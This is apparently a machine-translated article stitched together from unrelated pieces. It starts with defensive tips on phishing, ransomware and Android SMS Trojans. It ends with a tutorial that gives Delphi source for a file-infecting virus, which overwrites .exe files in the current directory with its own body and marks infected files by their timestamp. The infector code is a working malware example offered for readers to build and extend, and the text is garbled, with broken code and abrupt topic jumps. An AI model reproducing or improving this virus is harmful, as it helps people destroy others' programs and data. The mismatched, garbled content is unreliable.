Call the admin exorcist guys! The chief accountant caught a powerful virus, everything was gone! A frequent, frequent situation based on the human factor, fresh viral trends and the dedication of hackers. Indeed, why dig into someone else's software ourselves, if you can rely on the company's employees for this.
Yes, the products of large public and private firms are constantly hacked, although hundreds of experienced people work to create and maintain them.
And an ordinary person has nothing to oppose to hackers. At the same time, no one needs one lonely account, the goal of the hackers is to get a large database of potential victims and process it with "letters of happiness", spam or viruses. And we ourselves distribute all personal-public information from right to left.
Latest viral trends
A distinctive feature of all fresh viruses and hacker techniques is that they interact with a person, not a system. That is, the victim starts the process. This is called "social engineering" - a method of illegal access to information based on the characteristics of human psychology. And if earlier attackers had to turn into real detectives, tracking down their targets, communicating, sometimes even getting a job in a hacked company, now we can say thanks to social networks. They greatly simplified and accelerated the process of collecting information.
After scouring VK, Twitter, FB and Instagram of your target, you can get an exact profile of a person with his phone number, mail, names of parents, friends and other details. And all this is free and voluntary - use it, dear!
And if fraudsters gain access to the corporate mail of one of your employees, spam mailing threatens not only everyone within the company, but also your customers. Otherwise, hackers will permanently disable the employee's computer by sending some kind of "report" to the mail.
Hackers plan attacks on those who work with valuable information - secretaries, managers, accountants, HRs.
Since recovering documents, systems, sites or obtaining passwords will cost you a pretty penny, you need to understand what we are dealing with. So that all these "social engineers" could not cash in on you, we will analyze one of the fresh viral schemes.
Ransomware
The ransomware virus spreads via e-mail under the guise of serious documents: subpoenas, invoices, requests from the tax office. And in order not to install it yourself, you need to look both ways. One such virus was specially analyzed by our technicians so that we can show what to look for:
We follow the hands of these magicians:
- Threatening headline. “Notice to Appear in Court” means “Notice to Appear in Court”. The guys are trying to intimidate and force the user to open the letter.
- Sender address - [email protected] It clearly shows that this is not an official letter, but a spammer / hacker.
- Archive of the letter. There is a file there that should immediately alert (the file name includes .doc, but the js extension - the virus disguises itself as a Word document)
Attention! If a computer has been infected with a ransomware, then with a 95% probability the information will be lost forever. After downloading and launching a malicious file, a request is made to a remote server, from which the virus code is downloaded. All data on the computer is encrypted with a random sequence of characters.
To "decode" the files, you need a key that only the hacker has. The fraudster promises to decrypt the information back for a certain amount, but it is far from the fact that this will happen. What for? It is much easier to leave a person with no money and no data: contracts, acts, orders, any valuable and sensitive information. So make backups of especially important documentation, you will sleep more peacefully. In this situation, this is your only 100% virus protection.
Pay attention to the above features, and you can prevent dangerous cases of blocking computers and deleting important information. In any case, elimination of the consequences of critical vulnerabilities will be much more expensive than taking precautions.
Therefore, here are 6 more tips for detecting viruses and preventing infection:
1. Update your operating system and programs regularly. Important updates that are automatically installed by default can be disabled. But you shouldn't, as new versions often close discovered holes in software security.
2. Install antivirus and update the virus database regularly. 100 thousand new viruses appear every day!
3. Enable the display of file extensions: Control Panel \\ Folder Options \\ View \\ Advanced Options, uncheck the option "Hide extensions for registered file types" and click OK. This will ensure you always see the actual file extension. Most often, disguised viruses look like this: filename.doc.js and filename.pdf.exe. The real file extensions are js and exe, and everything in front of them is part of the filename.
4. Back up important files - work documents and photos. The frequency of backup should be selected depending on the frequency of file changes. For backup storage, you can use the cloud service if it allows you to revert to old versions of files and set up manual synchronization. Then, in the event of a computer infection, the virus will not enter the cloud. We also recommend keeping a copy of important data in an archive. Most viruses cannot penetrate the archive, and all archived information is restored after the computer is disinfected.
5. Improve the professional literacy of your specialists! As we said before, hackers tailor their attacks to our psychology, and are constantly improving their techniques. Don't think that anyone other than your company and team will click / upload / enter their details. Anyone can get caught, the task is only to select the right hook for a person. Therefore, train your employees, at least individually, at least as a team, at least in a playful way, at least somehow!
6. Watch carefully for letters in the mail, messages in corporate messengers and any other incoming information. Check the email addresses of senders, attachments and the content of letters. Most viruses need to be started manually in order to harm your computer.
We really hope that you are reading this article for preliminary information, and not because everything is already bad. We wish you never to encounter total uncontrolled spam, disappeared documentation in six months and other pleasant consequences of caught viruses. Follow the above six steps, keep your eyes open and may your information remain confidential!
Users are not always able to recognize a virus in their mobile phone and, accordingly, they cannot erase the malicious program or take any action before the virus gains access to personal data.
At the moment, Android smartphones are considered the most vulnerable. A new virus has appeared via SMS on Android.
In open source smartphones, which is the Android operating system, new viruses spread with incredible speed.
Now they have changed. Previously, they tried only to use money in mobile phones, but today they are targeting bank cards and all the funds available in the Internet bank. Fraudsters are primarily interested in smartphones with support for the Mobile Bank service. It allows you to steal money from the victim's account to the fraudster's number. To do this, they send a virus via SMS to Android.
How scammers work
The first such virus became active in early summer 2017. The danger is that the Trojan operates remotely in an Android smartphone.
Attackers send SMS to the desired number, so in order to identify the presence of this virus in their mobile gadget, smartphone owners should pay attention to the increase in the number of SMS messages at a cost of 100 rubles. As a result, a multiple of 100 is withdrawn from the smartphone owner's mobile account.
To make substantial money, the attacker is forced to send several SMS Trojans from his victim's number. After all, he is not the only one working in this fraudulent chain.
The Trojan settles in the victim's gadget and sends SMS messages from the victim's number to the “expensive” number of the scammers. And it is for these SMS-ki addressed to this "expensive" number that the victim is charged 100 rubles. for each unauthorized SMS message.
Intermediaries in this scheme can be a telecom operator, provider and other partners who may not know about the tricks of the fraudsters. To cover all expenses and make money, the attacker must withdraw at least 1,000 rubles from each number.
At the same time, we cannot exclude the possibility that smartphone owners may complain to their operator about the theft of money. And then they take retaliatory measures to prevent them from committing fraud. For example, they can enter the mandatory entry of additional confirmations before debiting money and the like. In such a situation, attackers are forced to look for new ways of fraud.
Thanks to these factors, another Trojan appeared. This Trojan-SMS representative also executes commands received from a remote server.
The new virus is more flexible and perfectly navigates in any conditions, taking into account the barriers of the mobile operator, and even the state of the subscriber's account and the time of transactions.
How the virus works
The new virus is dormant - it has no autonomy. Even after getting into a smartphone, it does not appear in any way. To make it work, you need a remote command from the owner of the phone.
For this, the so-called POST request is used. It is intended for a request in which the web server accepts data enclosed in the message body for storage. It is often used, for example, to upload a file.
Using a POST request makes it possible to establish a connection with a remote server and receive the corresponding command, after receiving which the Trojan starts sending expensive SMS messages from the numbers of its victims to the number of the scammers.
How does the new Trojan work? For example, the program automatically sends SMS messages with one word “BALANCE” to a number with support of “Mobile Bank”.
By sending an SMS message from a short number, fraudsters can thus check whether the victim's number is linked to a bank account and what is the state of the account.
Real life examples
For example, Sberbank has a number from which messages are sent - 900. When the message "BALANCE" (or, perhaps, in Russian, "balance") comes from the sender 900, then the owner of the phone, trusting Sberbank and being sure that this message is from of this bank, opens the message and responds to it, wanting to know what happened to the balance. Thus, the scammers receive an answer to their SMS, which for them means that a bank card is attached to the phone. Moreover, it becomes clear to them that this card can be controlled using SMS commands, which is included in the Mobile Banking service. And then, as they say, "a matter of technology."
One of my acquaintances recently received messages from the short number 4-74-1, which is registered with the Sberbank mobile bank with the message "The service is not available, please try later." For obvious reasons, she did not send an answer, already knowing about possible threats. Obviously, these are the same scammers, disguising themselves as a mobile bank, thus trying to calculate her reaction and determine whether a mobile bank is installed on her smartphone.
Classification
HLLO- High Level Language Overwrite. Such a virus overwrites the program with its body. Those.
the program is destroyed, and when the user tries to start the program, a virus is launched and "infects" further.
HLLC- High Level Language Companion. Most of these viruses belong to the hoary antiquity (8-10 years ago), when users had DOS and they were very lazy. These viruses look for the file, and without changing it, create a copy of themselves, but with the extension .COM. If a lazy user writes only a file name in the command line, then the first DOS looks for a COM file, launching a virus that first does its job, and then launches the EXE file. There is another modification
HLLC - more modern (7 years;)): The virus renames the file, keeping the name, but changing the extension - from EXE to, say, OBJ or MAP. The virus replaces the original file with its body. Those. the user launches a virus, which, after carrying out the act of reproduction, launches the necessary program - everyone is happy.
HLLP- High Level Language Parasitic. Most advanced. Attach their body to the file from the front (the virus starts first, then it restores the program and starts it) or from behind
- then in the title of the program we write jmp near to the body of the virus, still running first.
We can leave the program itself unchanged, then it will look like this:
What is MZ, I think you guessed it 🙂 These are the initials of your beloved Mark Zbikowski, which he modestly defined in the signature of the exe file 🙂 And I entered them here just for you to understand
- the infection occurs according to the principle of copy / b virus.exe program.exe, and there are no special jokes here. Not now. But you and I will do it
- be healthy:). Well, for example: you can encrypt the first 512 or more bytes of the original program with any algorithm you know - XOR / XOR, NOT / NOT, ADD / SUB, then it will look like:
In this case, the structure of the infected file will not be so clear.
I'm not in vain here (in the classification, in the sense) so crucify
- the parasitic algorithm is used by 90% of modern viruses, regardless of their distribution method. Okay, let's move on:
Network virus. Can be any of the following. It differs in that its distribution is not
limited to one computer, this infection in some way climbs through the Internet or a local network to other machines. I think you regularly take 3-4 such friends out of your soap box
- here's an example of a network virus. And once it gets to someone else's computer, it infects files in an arbitrary way, or does not infect AT ALL.
Macro viruses, script viruses, IRC viruses. I put them in one group because they are viruses written in languages \u200b\u200bbuilt into applications (MSOffice :)), scripts (your favorite VBS rules here) and IRC scripts. Strictly speaking, as soon as a sufficiently powerful (and / or leaky) scripting component appears in an application, viruses immediately start writing on it 😉 By the way, macro viruses are very simple and easily determined by heuristics.
Coding
Got it 🙂 Come on, run the dolphi, kill all sorts of windows and wipe all the nonsense from the project window. That is, in general, wipe everything 🙂 We will only work with DPR, containing:
program EVIL_VIRUS;
USES WINDOWS, SYSUTILS;
begin
end;
The logic of the virus, I think you already understood from the classification - we restore and run the program -\u003e wait for its completion -\u003e erase the "used file" (I forgot to say, we DO NOT CURE the infected program, we transfer the original code to the left file and run EXAMPLE: Infected file NOTEPAD.EXE Create a file _NOTEPAD.EXE in the same directory with the original code, and run it already) -\u003e search for an uninfected file and infect. That's all 🙂 The basic design of the virus looks like this.
Now declare the following variables and constants for your mighty brain:
VaR VirBuf, ProgBuf, MyBuf: array of char;
SR: TSearchRec;
My, pr: File;
ProgSize, result: integer;
PN, st: String;
si: Tstartupinfo;
p: Tprocessinformation;
infected: boolean;
CONST VirLen: longint \u003d 1000000;
The first line is dynamic arrays, into which we will write the body of the virus and the program, respectively; The SR variable will be written
characteristics of the found file-candidate for infection (I hope you are familiar with the FindFirst and FindNext procedures, because it will get worse further;)), My and
Pr is the file from where we started and the left file with the original program code (I already wrote about it above). result- the result of FindFirst, it must be equal to zero,
ProgSize is the size of the program code. The rest is clear from what follows, except
infected is a sign of infection of the found file and
VirLen is the length of the virus code, you will recognize it only after the wedding. Ugh, I wanted to say after compilation. Those. you compile, change the value of the constant in the source code and recompile.
We code further 🙂 Here you see the code responsible for restoring and launching the infected program:
SetLength (virbuf, VirLen);
AssignFile (my, ParamStr (0));
st: \u003d paramstr (0);
St: \u003d st + # 0;
CopyFile (@st, "c: \\ windows \\ program.exe", false);
IF FileSize (my)\u003e VirLen then
begin
// Run the program
AssignFile (my, "c: \\ windows \\ program.exe);
Reset (my);
ProgSize: \u003d FileSize (my) -VirLen;
BlockRead (my, virbuf, virlen);
SetLength (progbuf, pRogSize);
BlockRead (my, progbuf, progSize);
CloseFile (my);
PN: \u003d "_" + ParamStr (0);
AssignFile (pr, PN);
ReWrite (pr);
BlockWrite (pr, progbuf, progSize);
CloseFile (pr);
FillChar (Si, SizeOf (Si), 0);
with Si do
begin
cb: \u003d SizeOf (Si);
dwFlags: \u003d startf_UseShowWindow;
wShowWindow: \u003d 4;
end;
PN: \u003d PN + # 0;
Createprocess (nil, @ PN, nil, nil, false, Create_default_error_mode, nil, nil, si, p);
Waitforsingleobject (p.hProcess, infinite);
// Launched, the program worked. Let's erase it 🙂
ErAsE (pr);
Erase (my);
Everything here, in principle, is simple and understandable, except why I transferred the entire infected file to the Windows directory and what lines 3 to 5 are doing, inclusive.
And I did this because reading from a running file is uncomfortable and is possible only using CreateFile and ReadFile WinAPI. I will tell you about WinAPI coding later, now I will only cover the basics
- in Delphi.
These lines are the conversion of string to pchar by the folk method, since we are now fighting for every byte of code. Another point: I acted incorrectly by setting the path c: \\ windows so hard. Better use the GetWindowsDirectory procedure, find out for sure 🙂 Everything else is clear without any comments (if not
tie to skip computer science;)), go ahead:
result: \u003d FindFirst ("* .exe", faAnyFile, sr);
WHILE Result \u003d 0 DO
begin
// Check for lice
Infected: \u003d false;
IF DateTimeToStr (FileDateToDateTime (fileage (sr.name))) \u003d "08/03/98 06:00:00" then infected: \u003d true;
// Checked!
IF (infected \u003d false) and (sr.name<>paramstr (0)) then
begin
AssignFile (my, sr.Name);
ReWrite (my);
BlockWrite (my, virbuf, virlen);
BlockWrite (my, progbuf, sr.Size);
CloseFile (my);
FileSetDate (sr.Name, DateTimeToFileDate (StrToDateTime ("08/03/98 06:00:00")));
end;
end;
// If the virus is launched "clean", i.e. not from an infected program, then we end
end else halt;
What does your keen eye see here? That's right, the FindFirst procedure searches for the given victim (any exe file from the current directory), transfers its characteristics to the SR variable. Then you need to check it for contamination. This is done in an original way: when infected, the file is assigned a def. date and time. And any file with such characteristics is considered infected. Everything else is again obscenely simple, so I smoothly move on to the conclusion 🙂
Conclusion
So we have coded our first virus. So far, he only knows how to infect files in the current directory (although I'm sure you can easily upgrade it;)) and knows nothing about other directories and the Internet. Do not despair, we will quickly teach him this. Play around with these lines for now, and wait for the next article.
application
I would venture to give you a description of all the procedures used in the article. This will help you search for them in the help and prepare for coding serious viruses using
WinAPI.
AssignFile - no equivalent in WinAPI - matches a file
with a variable of type File or TextFile
Reset - analogs of _lopen and CreateFile - opens
existing file and sets position
reading to the beginning
ReWrite - _lcreate and CreateFile - creates a new file and
mouth reading position to the beginning. If you feed
ReWrite an existing file, its contents
will be reset
BlockRead - _lread and ReadFile - reads into buffer
a certain amount of data from a file
BlockWrite - _lwrite and WriteFile - respectively, writes
data to file
SeekFile - _llseek and SetFilePointer - moves position
read / write in an open file
CloseFile - _lclose and CloseHandle - closes open
file
Erase - DeleteFile - delete a file
FindFirst - FindFirstFile - search for a file by criteria
FindNext - FindNextFile - Find the next file
